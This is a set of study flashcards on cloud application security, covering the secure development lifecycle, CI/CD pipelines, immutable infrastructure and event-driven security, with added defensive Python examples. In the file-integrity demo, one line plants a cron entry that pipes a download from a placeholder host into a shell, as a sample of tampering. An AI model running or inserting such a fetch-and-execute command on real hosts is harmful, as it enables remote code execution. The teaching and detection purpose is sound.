10. Application Security - DONE Flashcards

1
Q

What are the major changes associated with application security in a cloud environment?

A

*Secure software development lifecycle (SSDLC): Use the SSDLC to determine how cloud computing affects application security from initial design through to deployment.
*Design and architecture: Several new trends in designing applications in a cloud environment affect, and can improve, security.
*DevOps and continuous integration/continuous deployment (CI/CD): DevOps and CI/CD are frequently used in both development and deployment of cloud applications and are becoming a dominant approach to software development, both in the cloud and in traditional data centers. DevOps brings new security considerations and opportunities to improve security compared with what you do today.

2
Q

Essentially, an SSDLC describes a series of security activities that should be performed during all phases of application design and development, deployment, and operations. Here are some of the more common frameworks used in the industry:

A

*Microsoft Security Development Lifecycle (SDL)
*NIST SP 800-64, "Security Considerations in the System Development Life Cycle"
*ISO/IEC 27034 Application Security Controls Project
*OWASP Secure Software Development Lifecycle Project (S-SDLC)

Although these frameworks all work toward a common goal of increasing security for applications, they all go about it just a little differently.

3
Q

Cloud computing will impact every phase of the SSDLC, regardless of which particular framework you use. This is a direct result of the abstraction and automation of the cloud, combined with a greater reliance on your cloud provider.

The Cloud Security Alliance breaks down the SSDLC into three larger phases:

A

*Secure design and development: This phase includes activities ranging from training and developing organizational standards to gathering requirements, performing design reviews through threat modeling (such as STRIDE), and writing and testing code.

*Secure deployment: This phase addresses the security and testing activities that must be performed when you move application code from a development environment into production.

*Secure operations: This phase concerns the ongoing security of applications while they are in a production environment. It includes additional defenses such as web application firewalls, ongoing vulnerability assessments, penetration tests, and other activities that can be performed once an application is in production.

4
Q

How does the shared responsibility model affect application security across the IaaS, PaaS, and SaaS service models?

A

Remember that in the shared responsibility model, change is based on the service model, whether IaaS, PaaS, or SaaS. If you are developing an application that will run in an IaaS service model, you are responsible for more of the security than you would be if you were leveraging features and services supplied by a PaaS provider. In addition, the service model affects the visibility and control that you have. For example, in a PaaS model, you may no longer have access to any network logs for troubleshooting or security investigation purposes.

5
Q

the CSA defines five phases involved in secure application design and development, all of which are affected by cloud computing:

A

*Training
*Define
*Design
*Develop
*Test
6
Q

What does the training phase in secure application design and development involve?

A

The CSA Guidance identifies three roles (developers, operations staff, and security teams) and three categories of training (vendor-neutral cloud security training, vendor-specific training, and development tool training). All three roles should receive vendor-neutral training on cloud security fundamentals (such as the CCSK).

These same groups should also undertake vendor-specific training on the cloud providers and platforms being used by the organization. Additionally, developers and operations staff who are directly involved in architecting and managing the cloud infrastructure should receive specific training on any development tools that will be used.

One of the final training elements should deal with how to create security tests. As the old saying goes, the answers you get are only as good as the questions you ask. Some companies tell developers in advance which security tests will be performed. Because the developers know what the security team will check before a system is accepted, this approach can lead to more secure applications being created in the first place. In a way, it sets developers up for success before they even begin writing code.

7
Q

How can OWASP be helpful in the training phase of secure application design and development?

A

Notice the inclusion of secure coding practices. OWASP (the Open Web Application Security Project) is one of the leading resources for secure web development. You can use the OWASP Secure Coding Practices checklist to address key development items such as input validation, output encoding, authentication and password management, session management, access control, cryptographic practices, error handling and logging, communication security, system configuration, database security, file management, memory management, and general coding practices.

8
Q

What does the Define phase in secure application design and development involve?

A

In this phase, coding standards are determined (usually based on compliance requirements) and functional requirements are identified. In other words, you determine what this application must do from a security perspective. This is, of course, above and beyond any business requirements that the application needs to address.

9
Q

What does the Design phase in secure application design and development involve?

A

During the application design phase, you need to determine whether there are any security issues with the design of the application itself. (Note that this is about design, not actual development.) You need to establish an understanding between the security and software development teams as to how the software application is architected, any modules that are being consumed, and so on.

The benefit of going through steps such as threat modelling is that you don’t have to take two steps forward and three steps back after the security team starts reviewing the application code itself. This can save you substantial amounts of time in development. Of course, you need to consider cloud providers and provider services as part of this application review. For example, you could ensure that your provider supports required logging capabilities as part of the design phase.

10
Q

What does the Development phase in secure application design and development involve?

A

In the development phase, we finally get to build the application. As with every other system and application ever built, the development environment should be kept separate from the production environment. In other words, developers should never create applications in a production environment or hold actual production data as part of the development phase. Developers will also probably be using some form of CI/CD pipeline, which needs to be properly secured, with a particular focus on the code repository (such as GitHub). In addition, if you will be leveraging PaaS or serverless development, enhanced logging must be baked into the application to compensate for the lack of logging that is usually available in such scenarios.

11
Q

What does the testing phase in secure application design and development involve?

A

Testing should be performed while an application is being developed. These tests can include code review, unit testing, static analysis, and dynamic analysis.

12
Q

How has the deployment phase changed over time?

A

The deployment phase marks the transition or handover of code from developers to operations. Traditionally, this has been the point at which a final quality check occurs, including user acceptance testing. The cloud, DevOps, and continuous delivery are changing that, however, and are enabling tests to be automated and performed earlier in the lifecycle. Many types of application security tests can be integrated into both the development and deployment phases.

13
Q

Here are some of the application security tests highlighted in the CSA Guidance:

A

*Code review: This process does not change as a result of moving to the cloud. There are, however, specific cloud features and functions that may be leveraged as part of an application, and you need to ensure that least privilege is enforced at all times inside the application code and all its dependencies. Not only should user permissions follow least privilege, but the services and any roles the application uses to access other services should as well. The worst thing you could do from an application-permission perspective is to have tight access controls for the users who can access the application while giving the application itself full control over every aspect of the cloud environment. In addition, you need to ensure that anything related to authentication, including the credentials used by an application and any required encryption, is reviewed as part of the code review.

*Unit testing, regression testing, and functional testing: These standard tests are used by developers and should address any API calls being used to leverage the functionality provided by a cloud provider.

*Static application security testing (SAST): SAST analyzes application code offline, without running it. SAST is generally rules-based and scans source code for items such as credentials embedded in the code and missing or weak input validation, both of which are major concerns for application security.

*Dynamic application security testing (DAST): While SAST looks at code offline, DAST tests an application while it is running. An example of DAST is fuzz testing, in which you throw malformed input at an application and try to trigger an error on the server (such as an HTTP 500 Internal Server Error from a web server). Because DAST is a live test against a running system, you may need to get approval from your provider in advance.

14
Q

From a security perspective, what are the primary differences between applications that run in a cloud and those that run in a traditional data center?

A

The handling of credentials and encryption within the application. These are the two areas that most need review when an application moves to the cloud.

15
Q

Cloud Impacts on Vulnerability Assessments.

A

Vulnerability assessments (VAs) should always be performed on images before they are used to launch instances. VAs can be integrated into the CI/CD pipeline. Testing images should occur in a special locked-down test environment such as a virtual network or separate account. As with all security tests, however, this must be done after approval for any testing is given by the provider.

With an ongoing VA of running instances, you can use host-based VA tools to get complete visibility into any vulnerabilities on a system. VAs can also be used to test entire virtual infrastructures by leveraging infrastructure as code (IaC) to build the test environment. This enables you to generate an exact replica of a production environment in minutes, so you can properly assess an application and all infrastructure components without the risk of impacting the production environment.

16
Q

What are the two ways VAs can be run?

A

One perspective is that a VA should be performed directly on a system itself to provide complete transparency and to allay fears that security controls in front of the system are hiding any exposures that actually exist. This is known as a "host-based" view.

The other approach is to take the view of an outsider and perform the VA with all controls, such as virtual firewalls, taken into account.

The CSA Guidance suggests that you use a host-based view by leveraging host-based agents. In this case, cloud provider permission will not be required, because the assessment is performed on the server, not across the provider’s network.

17
Q

As with VAs, penetration tests can also be performed in a cloud environment, and you’ll need permission from the provider to perform them.

A

The CSA recommends adapting your current penetration testing for the cloud by using the following guidelines:

*Use testing firms and individuals with experience working with the cloud provider where the application is deployed. Your applications will likely be using services supplied by the cloud service provider (CSP), and a penetration tester who does not understand the CSP's services may miss critical findings.

*The penetration test should address the developers and cloud administrators themselves. This is because many cloud breaches attack those who maintain the cloud, not just the application running in the cloud. Testing should include the cloud management plane.

*If the application you are testing is a multitenant application, ensure that the penetration tests include attempts to break tenant isolation and gain access to another tenant.

18
Q

Automated CI/CD pipelines can actually enhance security. Explain how.

A

Through supporting immutable infrastructures, automating security testing, and providing extensive logging of application and infrastructure changes when such changes are performed through the pipeline. The real power here is that there is no opportunity for human error when it comes to testing: 100 percent of the testing is performed 100 percent of the time. Test results can be directed to a test-result bucket so that, in the case of an audit, for example, all testing is easily demonstrated to an auditor. Logs can also record the person or system that submitted a change, and automated approval can be implemented in a change management system if all tests pass.

As with anything else, the pipeline itself must be tightly secured. Pipelines should be hosted in a dedicated cloud environment, with very limited access to production workloads and to the infrastructure hosting the pipeline components.

19
Q

Components of a continuous deployment pipeline

A
20
Q

There are two central components of the deployment pipeline:

A

The version control repository (such as GitHub) is where code is stored, and the continuous integration server (such as Jenkins) can use plug-ins to perform any prebuild, build, and post-build activities. Activities here could include performing security tests or functional tests and sending the results to a specified location. Additionally, the continuous integration server can connect to a change management system that tracks any approved changes to an environment. You can also set thresholds on test results. For example, if there are any critical findings, the continuous integration server will not even build the application or perform the action that has been requested.

All of these tests are created in advance. From a security perspective, this means that although you still have separation of duties with a CI/CD pipeline, humans are not performing the tests at build time. With this in mind, you can see how some (and, more importantly, the CSA Guidance) consider an automated continuous deployment pipeline as being a more secure approach to deploying software to an environment.
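The following is an added example (not code from the CSA Guidance or from the CCSK book these cards summarize) of the kind of pre-build security gate a continuous integration server plug-in would run. It ties together card 13 (SAST for embedded credentials, code review for least privilege on application roles) and card 20 (thresholds on test results that stop the build). It performs two checks, a regex-based scan of source for credential-looking strings and a least-privilege check of IAM-style policy documents for wildcard actions or resources, assigns each finding a severity, and fails the build when any finding meets the configured threshold. The regex patterns, the severity scale, the sample source and both policies are constructed for the example; the AKIA access key id is the one AWS uses in its own documentation and is not a live credential.

```python
"""CI security gate: secret scan + IAM least-privilege check + severity threshold.
Added example; patterns and sample inputs are constructed, not a production ruleset."""
import re
from dataclasses import dataclass

SEVERITY = {"low": 1, "medium": 2, "high": 3, "critical": 4}


@dataclass
class Finding:
    check: str      # which check produced it, e.g. "sast.secrets"
    severity: str   # key into SEVERITY
    location: str   # file:line or policy:Statement[n]
    detail: str


# Assumption: illustrative patterns only; real secret scanners carry hundreds.
SECRET_PATTERNS = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), "critical"),
    ("hardcoded_password",
     re.compile(r"""(?i)(password|passwd|secret)\s*=\s*["'][^"']{6,}["']"""), "high"),
    ("private_key_block", re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"), "critical"),
]


def scan_for_secrets(filename, source):
    """SAST-style check: flag lines that look like credentials embedded in code."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern, sev in SECRET_PATTERNS:
            if pattern.search(line):
                findings.append(Finding("sast.secrets", sev, f"{filename}:{lineno}", name))
    return findings


def _as_list(value):
    return value if isinstance(value, list) else [value]


def check_iam_policy(name, policy):
    """Least-privilege check: flag Allow statements with wildcard actions or resources."""
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action", []))
        resources = _as_list(stmt.get("Resource", []))
        loc = f"{name}:Statement[{idx}]"
        full_admin = "*" in actions
        if full_admin:
            findings.append(Finding("iam.least_privilege", "critical", loc, "Action allows '*'"))
        elif any(a.endswith(":*") for a in actions):
            findings.append(Finding("iam.least_privilege", "high", loc, "service-wide action wildcard"))
        if "*" in resources:
            sev = "critical" if full_admin else "medium"
            findings.append(Finding("iam.least_privilege", sev, loc, "Resource is '*'"))
    return findings


def gate(findings, fail_at="high"):
    """Return (passed, blocking). The CI server proceeds to build only when passed is True."""
    threshold = SEVERITY[fail_at]
    blocking = [f for f in findings if SEVERITY[f.severity] >= threshold]
    return len(blocking) == 0, blocking


def run_pipeline_gate(sources, policies, fail_at="high"):
    """Run every check over the submitted sources and IaC policy documents, then apply the gate."""
    findings = []
    for fname, src in sources.items():
        findings += scan_for_secrets(fname, src)
    for pname, pol in policies.items():
        findings += check_iam_policy(pname, pol)
    return gate(findings, fail_at)


# Constructed sample inputs ---------------------------------------------------
SAMPLE_SOURCE = '''import boto3
AWS_KEY = "AKIAIOSFODNN7EXAMPLE"   # constructed: AWS's documentation example key id
db_password = "hunter2hunter2"
client = boto3.client("s3")
'''

OVERLY_BROAD_POLICY = {  # the "give the application full control" anti-pattern from card 13
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
}

SCOPED_POLICY = {  # least privilege: one action on one constructed bucket
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": ["s3:GetObject"],
                   "Resource": "arn:aws:s3:::example-app-bucket/*"}],
}

if __name__ == "__main__":
    passed, blocking = run_pipeline_gate({"app.py": SAMPLE_SOURCE}, {"app-role": OVERLY_BROAD_POLICY})
    print("BUILD", "OK" if passed else "BLOCKED")
    for f in blocking:
        print(f"  {f.severity:8} {f.check:20} {f.location}: {f.detail}")
```

Run as a script it reports the build as blocked with four findings; swapping in SCOPED_POLICY and removing the embedded strings lets it pass. In a real pipeline the same functions would run as a prebuild step and their output would be written to the test-result location the cards describe.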

21
Q

Impact of IaC and Immutable Workloads

A

IaC uses templates to create everything, from the configuration of a particular server instance to the entire cloud virtual infrastructure. The depth of IaC capabilities is entirely provider-dependent. If the provider does not support API calls to create a new user account, for example, you must do this manually.

Because these environments are automatically built for us from a set of source file definitions (templates), they can also be immutable. This means that any changes that are manually implemented will be overwritten the next time a template is run. When you use an immutable approach, you must always check for any changes made to the environment, and these changes must be made through these templates—potentially through the continuous deployment pipeline if you are using one. This enables you to lock down the entire infrastructure tightly—much more than is normally possible in a non-cloud application deployment.
The bottom line here is that when security is properly engaged, the use of IaC and immutable deployments can significantly improve security.

22
Q

Secure operations
Other elements of security, such as infrastructure security (Chapter 7), container security (Chapter 8), data security (Chapter 11), and identity and access management (Chapter 12), are key components of a secure operations phase.

The following is additional guidance that directly applies to application security:

A

*Production and development environments should always be separated. Access to the management plane for production environments should be locked down much more tightly than that of the development environment. When assessing privileges assigned to an application, you must always be aware of the credentials being used by the application to access other services. These must be assigned on a least-privilege basis, just as you would assign least privilege to user accounts. Multiple sets of credentials for each application service can be implemented to compartmentalize entitlements (permissions) further in support of the least-privilege approach.
*Even when using an immutable infrastructure, you should actively monitor for changes and deviations from approved baselines. Again, depending on the particular cloud provider, this monitoring can and should be automated whenever possible. You can also use event-driven security (covered in the next section) to revert any changes to the production environment automatically.
*Application testing and assessment should be considered an ongoing process, even if you are using an immutable infrastructure. As always, if any testing and/or assessments will be performed across the provider's network, they should be performed with the permission of the CSP to avoid violating any terms of service.
*Always remember that change management isn't just about application changes. Any infrastructure and cloud management plane changes should be approved and tracked.

23
Q

Several traits of the cloud can be used to augment the security of applications through the application architecture itself. Examples include:

A

Cloud services can offer segregation by default. Applications can be run in their own isolated environments. Depending on your provider, you can run applications in separate virtual networks or in different accounts. Although operational overhead is incurred when using a separate account for every application, separate accounts offer the benefit of management plane segregation, thus minimizing access to the application environment.

If you do have an immutable infrastructure, you can increase security by disabling remote logins to immutable servers and other workloads, adding file integrity monitoring, and integrating immutable techniques into your incident recovery plans.

PaaS and serverless technologies can reduce the scope of your direct security responsibilities, but this comes at the cost of increasing your due diligence responsibilities. This is because you are leveraging a service from the provider (assuming the provider has done a good job in securing the services they offer customers). The provider is responsible for securing the underlying services and operating systems.
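As an added example (not code from the CSA Guidance or the CCSK book), here is a concrete form of the guidance in card 22 to "monitor for deviations from approved baselines" on an immutable workload and of the file integrity monitoring mentioned above. A manifest of SHA-256 digests is captured when the image is built; a later scan of the running host is compared against it, and any added, removed or modified file is a deviation, since on an immutable host nothing outside the ignored runtime paths should change. The ignored directory list, the file names and the tampering scenario in demo() are all constructed in a temporary directory.

```python
"""File integrity baseline and drift detection for an immutable workload.
Added example; the ignore list and the demo file tree are constructed."""
import hashlib
import os
import tempfile

# Assumption: paths that legitimately change at runtime and are excluded from the baseline.
DEFAULT_IGNORE = ("proc", "sys", "dev", "tmp", "var/log")


def file_digest(path, chunk_size=65536):
    """SHA-256 of a file's contents, read in chunks so large files are handled."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root, ignore_dirs=DEFAULT_IGNORE):
    """Map relative path -> digest for every regular file under root (symlinks skipped)."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        rel_dir = "" if rel_dir == "." else rel_dir
        if any(rel_dir == d or rel_dir.startswith(d + "/") for d in ignore_dirs):
            dirnames[:] = []          # do not descend into ignored trees
            continue
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = f"{rel_dir}/{name}" if rel_dir else name
            manifest[rel] = file_digest(full)
    return manifest


def detect_drift(baseline, current):
    """Compare two manifests; three empty lists means the host still matches its image."""
    base_paths, cur_paths = set(baseline), set(current)
    return {
        "added": sorted(cur_paths - base_paths),
        "removed": sorted(base_paths - cur_paths),
        "modified": sorted(p for p in base_paths & cur_paths if baseline[p] != current[p]),
    }


def demo():
    """Constructed scenario: baseline an 'image', tamper with the running copy, report drift."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        os.makedirs(os.path.join(root, "var", "log"))
        with open(os.path.join(root, "etc", "app.conf"), "w") as f:
            f.write("listen=443\n")
        with open(os.path.join(root, "app.py"), "w") as f:
            f.write("print('hello')\n")
        baseline = build_manifest(root)          # captured at image build time

        # Changes made on the supposedly immutable host after deployment:
        with open(os.path.join(root, "etc", "app.conf"), "a") as f:
            f.write("debug=true\n")                                  # modified
        with open(os.path.join(root, "etc", "cron.d"), "w") as f:
            f.write("* * * * * curl http://example.invalid | sh\n")  # added
        os.remove(os.path.join(root, "app.py"))                       # removed
        with open(os.path.join(root, "var", "log", "app.log"), "w") as f:
            f.write("noise\n")                                       # ignored path, no drift

        return detect_drift(baseline, build_manifest(root))


if __name__ == "__main__":
    print(demo())
```

In practice the baseline manifest is produced by the same pipeline that builds the image and stored outside the host, so an attacker who modifies the instance cannot also modify the reference; a non-empty drift result is the event that the event-driven response in the next card would act on, typically by replacing the instance from the template rather than repairing it in place.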

24
Q

Here are two major concepts that serverless computing can deliver to increase the security of our cloud environments:

A

*Software-defined security: This concept involves automating security operations and could include automating cloud incident response, changes to entitlements (permissions), and the remediation of unapproved infrastructure changes.

*Event-driven security: This puts the concept of software-defined security into action. A system monitors for changes and calls a script to perform an automatic response when a change is discovered. For example, if a security group is changed, a serverless function can be kicked off to undo the change. This interaction is usually performed through some form of notification messaging. Security can define the events to monitor and use event-driven capabilities to trigger automated notification and response; serverless compute is what typically runs the response.

Software-defined security is a concept, whereas event-driven security puts that concept into action.
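The security group example above, worked through as an added example (not code from the CSA Guidance or the CCSK book): a serverless-style handler receives a change notification, decides whether the new ingress rules violate policy, and reverts the offending ones. The event layout is modelled loosely on a CloudTrail AuthorizeSecurityGroupIngress record but is constructed here and simplified; verify the field names against your provider's actual schema before relying on them. The cloud API is abstracted behind a tiny recording client so the example runs offline; in production that object would be the provider SDK client. The allowlist of ports that may be opened to the internet is an assumed policy.

```python
"""Event-driven security: revert internet-exposed security group rules.
Added example; event shape, group id, account id and port allowlist are constructed."""

ANYWHERE = {"0.0.0.0/0", "::/0"}
# Assumption: policy permits only these TCP ports to be exposed to the internet.
ALLOWED_PUBLIC_TCP_PORTS = {80, 443}


class RecordingEc2Client:
    """Stand-in for a real SDK client; records the revocations it is asked to make."""

    def __init__(self):
        self.revoked = []

    def revoke_security_group_ingress(self, GroupId, IpPermissions):
        self.revoked.append({"GroupId": GroupId, "IpPermissions": IpPermissions})


def _public_ranges(perm):
    """CIDRs in this permission that mean 'the whole internet', split by address family."""
    v4 = [r["cidrIp"] for r in perm.get("ipRanges", {}).get("items", []) if r.get("cidrIp") in ANYWHERE]
    v6 = [r["cidrIpv6"] for r in perm.get("ipv6Ranges", {}).get("items", []) if r.get("cidrIpv6") in ANYWHERE]
    return v4, v6


def unsafe_permissions(ip_permissions):
    """Return revoke specs for granted rules that expose non-allowlisted ports to the world."""
    unsafe = []
    for perm in ip_permissions:
        v4, v6 = _public_ranges(perm)
        if not (v4 or v6):
            continue                      # rule is not world-reachable; leave it
        proto = perm.get("ipProtocol")
        lo, hi = perm.get("fromPort"), perm.get("toPort")
        if proto == "tcp" and lo == hi and lo in ALLOWED_PUBLIC_TCP_PORTS:
            continue                      # explicitly permitted public service port
        spec = {"IpProtocol": proto}
        if proto != "-1":                 # "-1" means all traffic; ports are not part of that spec
            spec["FromPort"], spec["ToPort"] = lo, hi
        if v4:
            spec["IpRanges"] = [{"CidrIp": c} for c in v4]
        if v6:
            spec["Ipv6Ranges"] = [{"CidrIpv6": c} for c in v6]
        unsafe.append(spec)
    return unsafe


def handle_event(event, ec2):
    """Entry point the serverless platform would invoke with the change notification."""
    detail = event.get("detail", {})
    if detail.get("eventName") != "AuthorizeSecurityGroupIngress":
        return {"action": "ignored", "eventName": detail.get("eventName")}
    params = detail.get("requestParameters", {})
    group_id = params.get("groupId")
    to_revoke = unsafe_permissions(params.get("ipPermissions", {}).get("items", []))
    if not to_revoke:
        return {"action": "none", "groupId": group_id}
    ec2.revoke_security_group_ingress(GroupId=group_id, IpPermissions=to_revoke)
    return {"action": "reverted", "groupId": group_id, "revoked": len(to_revoke),
            "changedBy": detail.get("userIdentity", {}).get("arn")}


# Constructed event: someone opened SSH (22) and HTTPS (443) to the whole internet.
SAMPLE_EVENT = {
    "detail": {
        "eventName": "AuthorizeSecurityGroupIngress",
        "userIdentity": {"arn": "arn:aws:iam::111122223333:user/example-dev"},
        "requestParameters": {
            "groupId": "sg-0123456789abcdef0",
            "ipPermissions": {"items": [
                {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
                 "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}},
                {"ipProtocol": "tcp", "fromPort": 443, "toPort": 443,
                 "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}},
            ]},
        },
    }
}

if __name__ == "__main__":
    client = RecordingEc2Client()
    print(handle_event(SAMPLE_EVENT, client))
    print(client.revoked)
```

Only the SSH rule is revoked; the HTTPS rule is left in place because the allowlist says 443 may be public. The handler returns who made the change so the same function can also raise the notification the card mentions, and the function's own execution role should be limited to the revoke call, in line with the least-privilege guidance elsewhere in this chapter.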

25
Q

Microservices are a growing trend in application development and are well suited to cloud environments. How can they impact application design and architecture?

A

Using microservices, you can break down an entire application into its individual components and run those components on separate virtual servers or containers. In this way, you can tightly control access and reduce the attack surface of the individual functions by eliminating all services that are not required for a particular function to operate.

Leveraging auto-scaling can also assist with availability, as only functions that require additional compute capacity need to be scaled up. There is additional overhead from a security perspective with microservices, however, because communications between the various functions and components need to be tightly secured. This includes securing any service discovery, scheduling, and routing services.

26
Q

What is DevOps?

A

DevOps is the deeper integration of development and operations teams that delivers automation of application deployments and infrastructure operations, resulting in higher-quality code in a faster time frame.

It is a culture, not a tool. Nor is it a technology that you can just buy off the shelf and implement.

From a technical perspective, DevOps relies on the CI/CD pipeline. It uses programmatic automation tools to improve the management of an infrastructure. Although DevOps is a newer approach that is often seen in the cloud, it is not exclusively a cloud-based approach to software deployment.

27
Q

SecDevOps vs DevSecOps

A

Technically, SecDevOps implies that you put security first, whereas DevSecOps implies that you do development, run it through security, and then hand it to operations. The main goal either way is the same: integrating security checks into the CI/CD pipeline.

28
Q

Rugged DevOps

A

Basically, this refers to the integration of security testing throughout the entire application development process to produce more secure (aka rugged) and resilient applications.

29
Q

Security Implications and Advantages of DevOps

A

The CI/CD pipeline produces master images for virtual machines, containers, and infrastructure stacks very quickly and consistently. This enables automated deployments and immutable infrastructure. How is code approved to be deployed? You integrate security tests into the build process. Of course, manual testing is also possible as a final check prior to the application being launched in a production environment.

Auditing can be supported (and in many cases improved) through this automated testing of application code prior to the application being built. Everything can be tracked down to the individual changes in source files, all the way back to the person who made a change and an entire history of changes, which can be tracked in a single location. This offers considerable audit- and change-tracking benefits.

Speaking of change management, if the change management system you currently use exposes APIs, the CI/CD pipeline can automatically obtain approval for any deployment. Simply put, if a request for deployment comes in through the continuous integration server, the change management system can be set up to approve automatically any change based on the fact that the tests have been successful.

30
Q

Key takeaways for application security in the cloud (1 of 2):

A

*Understand the security capabilities of your cloud provider and know that every platform and service needs to be inspected prior to adoption.

*Build security into the initial design process. Security is commonly brought into applications when it is too late. Secure applications are a result of a secure design.

*Even if you don't have a formal software development life cycle in your organization, consider moving toward a continuous deployment method and automating security into the deployment pipeline. This still supports separation of duties, but a human is not performing the tests every single time. The security team creates the tests and the automated system runs them 100 percent thoroughly, 100 percent of the time.

*Threat modeling such as STRIDE, static application security testing (SAST), and dynamic application security testing (DAST) should all be integrated into application development.

31
Q

Key takeaways for application security in the cloud (2 of 2):

A

*Application testing must be created and performed for a particular cloud environment. A major focus of application checks in a cloud environment is that of API credentials that are being used. Simply stated, you want to ensure that any application does not access other services with excessive privileges.

*If you are going to leverage new architectural options and requirements, you will need to update security policies and standards. Don’t merely attempt to enforce existing policies and standards in a new environment, where things are created and run differently than in a traditional data center.

*Use software-defined security to automate security controls.

*Event-driven security is a game-changer. Using serverless technology, you can easily kick off a script that will automatically respond to a potential incident.

*Applications can be run in different cloud environments, such as under different accounts, to improve segregation of management plane access.

32
Q

Prior to developing applications in a cloud, which training(s) should be undertaken by security team members?

A

Security team members should take both vendor-neutral training (such as CCSK) and provider-specific training (these are also recommended for developers and operations staff). Tools that are specific to deployments are not listed as required for security team members, only for operations and development staff.

33
Q

Tristan has just been hired as CIO of a company. His first desired action is to implement DevOps. Which of the following is the first item that Tristan should focus on as part of DevOps?

A

Remember that DevOps is a culture, not a tool or technology (although a continuous integration service is a key component of the CI/CD pipeline that DevOps leverages). Understanding the existing corporate culture and getting leadership buy-in should be Tristan's first course of action in implementing DevOps in his new position. DevOps is not a cloud technology.

34
Q

When you’re planning a vulnerability assessment, what is the first action you should take?

A

You should always determine whether the provider must be advised of any assessment in advance. If the provider requires advance notice as part of the terms and conditions of your use, not advising them of an assessment may be considered a breach of contract.

35
Q

Which of the following CI/CD statements is false?

A

The false statement is that a CI/CD system replaces the current change management processes. In fact, a CI/CD system can integrate with your current change management system. All the other statements are true.

36
Q

During which phase of the SSDLC should penetration testing first be performed by customers?

A

Penetration testing should be initially performed as part of the deployment phase of the SSDLC. You need to have an actual application to perform penetration testing against, and this testing should be performed before the application runs in a production environment. Of course, periodic penetration testing is a good thing during the operations phase, but the question asked when it should first be performed.